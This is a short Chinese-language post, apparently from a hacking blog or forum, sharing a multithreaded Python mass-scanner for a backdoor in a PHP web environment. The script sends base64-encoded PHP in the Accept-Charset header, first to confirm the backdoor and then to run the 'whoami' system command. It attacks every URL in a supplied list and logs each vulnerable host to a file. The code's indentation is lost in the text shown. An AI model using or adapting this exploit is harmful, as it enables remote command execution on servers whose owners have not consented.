根據土司的老哥的一個腳本 自己加了下多線程
代碼如下:
# coding=utf-8
import re
import requests
import concurrent.futures
requests.packages.urllib3.disable_warnings()
def attack(url):
Req_headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9',
'accept-charset': 'ZWNobyBtZDUoMzMzKTs=',
'Accept-Encoding': 'gzip,deflate',
'Connection': 'close',
}
Request = requests.get(url.strip('/') + '/index.php', headers=Req_headers,
timeout=5, verify=False)
res = re.findall(
"310dcbbf4cce62f762a2aaa148d556bd", Request.text, re.S)
if res:
resmsg = ""
try:
Req_headers["accept-charset"] = "ZWNobyAienBjaGNiZCI7c3lzdGVtKCJ3aG9hbWkiKTtlY2hvICJ6cGNoY2JkIjs="
Request = requests.get(url.strip('/') + '/index.php', headers=Req_headers,
timeout=5, verify=False)
res = re.findall("zpchcbd(.*?)zpchcbd",
Request.text, re.S)
if res:
print(url + '存在後門,保存到success.txt。')
with open('success.txt', 'a+') as f:
f.write('存在後門:' + url + '\n')
except Exception as e:
pass
New_start = input(('導入批量url文本:'))
list_ = list(set(
[x.replace('\n', '') if x.startswith('http') else 'http://' + x.replace('\n', '') for x in
open(New_start, 'r', encoding='UTF-8').readlines()]))
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
for site in list_:
future = executor.submit(attack, site) # 返回創建好的future實例
效果圖: